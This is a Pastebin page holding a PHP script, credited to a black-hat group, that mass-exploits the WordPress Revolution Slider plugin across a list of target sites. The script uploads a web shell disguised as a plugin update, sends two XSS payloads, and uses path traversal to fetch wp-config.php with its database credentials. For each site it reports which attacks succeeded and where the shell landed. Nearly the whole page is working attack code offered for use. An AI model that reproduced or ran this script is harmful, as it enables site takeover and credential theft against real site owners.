daily pastebin goal
40%
SHARE
TWEET

Untitled

a guest Oct 12th, 2017 144 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /** me@dwisiswanto.my.id **/
  3.  
  4. /******************************************
  5.  First, install PHP CLI
  6.  USAGE: php exploit.php list-of-target.txt
  7. ******************************************/
  8.  
  9. $cafc = array(
  10.     "file"=>"revslider.zip", // enter a ur shell file into a zip
  11.     "xss"=>"<marquee>CaFc Versace was Here", // for xss
  12.     "kfg"=>"..\wp-config.php" // for download config
  13. );
  14.  
  15. function hajar($yuerel, $dataAing=null) {
  16.     $cuih = curl_init();
  17.     curl_setopt($cuih, CURLOPT_URL, $yuerel);
  18.     if ($dataAing != null){
  19.         curl_setopt($cuih, CURLOPT_POST, true);
  20.         curl_setopt($cuih, CURLOPT_POSTFIELDS, $dataAing);
  21.     }
  22.     curl_setopt($cuih, CURLOPT_FOLLOWLOCATION, true);
  23.     curl_setopt($cuih, CURLOPT_RETURNTRANSFER, true);
  24.     curl_setopt($cuih, CURLOPT_SSL_VERIFYPEER, false);
  25.     $eks = curl_exec($cuih);
  26.     curl_close($cuih);
  27.     return $eks;
  28. }
  29.  
  30. $site = @file_get_contents($argv[1]);
  31. $tumbal = explode("\r\n", $site);
  32. echo "Calculate the target list : " . count($tumbal);
  33. if (!isset($site)) {
  34.     echo "Site N/A.";
  35. } else {
  36.     foreach ($tumbal as $uri) {
  37.         echo "\n------------------------------------";
  38.         echo "\nTarget => " . $uri;
  39.         echo "\n";
  40.         $menta = hajar($uri . "/wp-admin/admin-ajax.php", array(
  41.             "action" => "revslider_ajax_action",
  42.             "client_action" => "update_plugin",
  43.             "update_file" => $cafc['file'])
  44.         );
  45.         $jason = json_decode($menta, true);
  46.         if ($jason['success'] == false || $jason['message'] == "Wrong request") {
  47.             echo "\nExploit [update_plugin] => NOT VULNERABLE";
  48.         } else {
  49.             echo "\nExploit [update_plugin] => SUCCESS";
  50.             echo "\n[+] " . $uri . "/wp-content/plugins/revslider/temp/update_extract/revslider/YOUR_FILE.php\n";
  51.         }
  52.  
  53.         $menta2 = hajar($uri . "/wp-admin/admin-ajax.php", array(
  54.             "action" => "revslider_ajax_action",
  55.             "client_action" => "get_captions_css",
  56.             "data" => $cafc['xss'])
  57.         );
  58.         $jasonB = json_decode($menta2, true);
  59.         if ($jasonB['success'] == false || $jason['message'] == "Wrong request") {
  60.             echo "\nExploit [get_captions_css] => NOT VULNERABLE";
  61.         } elseif ($jasonB['success'] == true) {
  62.             echo "\nExploit [get_captions_css] => SUCCESS";
  63.             echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
  64.             echo "action=revslider_ajax_action&";
  65.             echo "client_action=get_captions_css";
  66.             echo "data=" . urlencode($cafc['xss']) . "\n";
  67.         }
  68.  
  69.         $menta3 = hajar($uri . "/wp-admin/admin-ajax.php", array(
  70.             "action" => "revslider_ajax_action",
  71.             "client_action" => $cafc['xss'])
  72.         );
  73.         $jasonC = json_decode($menta3, true);
  74.         if (preg_match("/wrong ajax action/i", $jasonC['message'])) {
  75.             echo "\nExploit [xss] => SUCCESS";
  76.             echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
  77.             echo "action=revslider_ajax_action";
  78.             echo "client_action=" . urlencode($cafc['xss']) . "\n";
  79.         } else {
  80.             echo "\nExploit [xss] => NOT VULNERABLE";
  81.         }
  82.  
  83.         $menta4 = hajar($uri . "/wp-admin/admin-ajax.php", array(
  84.             "action" => "revslider_show_image",
  85.             "img" => $cafc['kfg']),
  86.         $uri);
  87.         if ($menta4 == "empty image" || $menta4 == "image file not found" || $menta4 == 0) {
  88.             echo "\nExploit [wp-config] => NOT VULNERABLE\n";
  89.         } else {
  90.             echo "\nExploit [wp-config] => SUCCESS";
  91.             echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
  92.             echo "action=revslider_show_image";
  93.             echo "img=" . $cafc['kfg'] . "\n";
  94.         }
  95.     }
  96. }
  97. ?>
  98. -------------------------------------------------------------------------------------
  99.  
  100.  
  101. # Credits :
  102. -------------------------------------------------------------------------------------
  103. CaFc Versace
  104. Thanks : Agency CaFc - Surabaya BlackHat
  105. -------------------------------------------------------------------------------------
  106.  
  107.  
  108. ./learn to be better
RAW Paste Data
Top